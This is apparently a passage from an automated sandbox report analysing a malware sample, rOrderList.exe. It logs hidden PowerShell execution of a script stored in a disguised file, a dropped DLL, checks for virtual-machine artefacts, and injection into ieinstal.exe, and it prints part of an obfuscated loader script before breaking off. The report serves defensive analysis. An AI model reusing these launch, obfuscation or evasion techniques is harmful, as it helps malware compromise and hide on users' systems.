            Source: C:\Users\user\Desktop\rOrderList.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $a = Get-Content 'C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Smalsidernes\Eurindic.zoo' ; powershell.exe "$a"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07DE613C push es; ret 4_2_07DE6140
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07DE6131 push es; ret 4_2_07DE6160
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07DEAF6C push es; ret 4_2_07DEAF70
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07DE6D10 push eax; mov dword ptr [esp], edx4_2_07DE6D24
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07DEBC4C push es; ret 4_2_07DEBC50
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07DE6B58 push eax; mov dword ptr [esp], edx4_2_07DE6D24
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FA775A push FFFFFFB9h; ret 4_2_07FA775C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FA8571 push FFFFFF8Bh; retf 4_2_07FA8573
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FA8568 push FFFFFF8Bh; retf 4_2_07FA856A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0872B97A push eax; mov dword ptr [esp], edx4_2_0872B9B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0872A2AE push FFFFFF8Bh; iretd 4_2_0872A2B6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0872CBCC push eax; iretd 4_2_0872CBCD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0872FF60 push eax; retf 4_2_0872FF61
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0872C7D3 push edi; retf 4_2_0872C7D6
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026BA26E pushfd ; ret 6_2_026BA288
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026BAE55 push ds; ret 6_2_026BAE7C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B76E1 push E17699D6h; retf 6_2_026B76E6
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026BAEE7 push ds; ret 6_2_026BAE7C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B7AF2 push edx; iretd 6_2_026B7B28
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B72BF push esi; ret 6_2_026B72D2
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B92BD push edi; retf 6_2_026B92BE
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026BB72B push C1C7FE38h; ret 6_2_026BB730
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B973B push ds; ret 6_2_026B973C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B5F33 push ebp; iretd 6_2_026B5F34
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B9BED push ds; ret 6_2_026B9BF0
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B6BCD push ecx; ret 6_2_026B6C2D
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B83CC push ds; ret 6_2_026B83D4
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026BA7BB push ebp; ret 6_2_026BA7BC
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B9FB7 push ss; ret 6_2_026B9FBA
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026B7471 push ds; ret 6_2_026B7474
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_026BA077 push ds; ret 6_2_026BA090
            Source: prldap60.dll.0.drStatic PE information: section name: .00cfg
            Source: C:\Users\user\Desktop\rOrderList.exeFile created: C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness\prldap60.dllJump to dropped file
            Source: C:\Users\user\Desktop\rOrderList.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: powershell.exe, 00000004.00000002.1375869698.0000000007127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: powershell.exe, 00000004.00000002.1375869698.00000000070E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1256Thread sleep count: 8295 > 30Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 5632Thread sleep count: 128 > 30Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 5632Thread sleep time: -384000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\rOrderList.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness\prldap60.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9082Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8295Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
            Source: C:\Users\user\Desktop\rOrderList.exeAPI call chain: ExitProcess graph end nodegraph_0-3727
            Source: ieinstal.exe, 00000006.00000003.3487806711.000000000755B000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5938763780.000000000755B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000004.00000002.1375869698.0000000007127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: ieinstal.exe, 00000006.00000002.5938397389.0000000007528000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3486333941.0000000007527000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
            Source: powershell.exe, 00000004.00000002.1375869698.00000000070E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07FA6E78 LdrInitializeThunk,4_2_07FA6E78

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 26B0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#soldierproof iscremernes vagthundes taktmssigt embroaden secluded #>$bisonerne = """ f;baf jufon bcfetesireoscn t hwlyabefovfloetad b8la un{ v n s al svpafafar laswmba( p[udssctforcoi pn ag s]fo`$ ul rutrvtjamar utsw) k;ca di`$baupencrdbieunc nkbledid n4 l c=ba ls`$jelveuauv ba srant i.salboeenntnggrthjhap;to s fr su u`$frdapomeltilvaablrmal me uahaf h pl=no banhee swtv- coscbbrjunevacuntju chb hyaat sequ[ud] t r( l`$ hu nnnod hedecmik lefadya4mo ph/se un2tr)fn;fo h gr un tfhaoenrni( b`$ rpatolulpayinp eh ro mnkii ac sa blfilgnyre=sk0ak; b fr`$fapwao rlirydopelhpuo on si wc latelull fy d r-krlkltfr ge`$enulinidd jelecemkhvefodsa4lv; t ch`$vepsjoomlgeyalp ahseoufnueisccfla tlcalpaypr+ r=pi2an) m{ f or ko o o re c pr f`$ sd oo klcal sa prhil seudaglfva[ e`$sup loopl sytop ph eo mn uisocsoaraludl myau/ i2be]al ma= h ma[orc to rnirvhoeblr ctsp]be:wa:bet 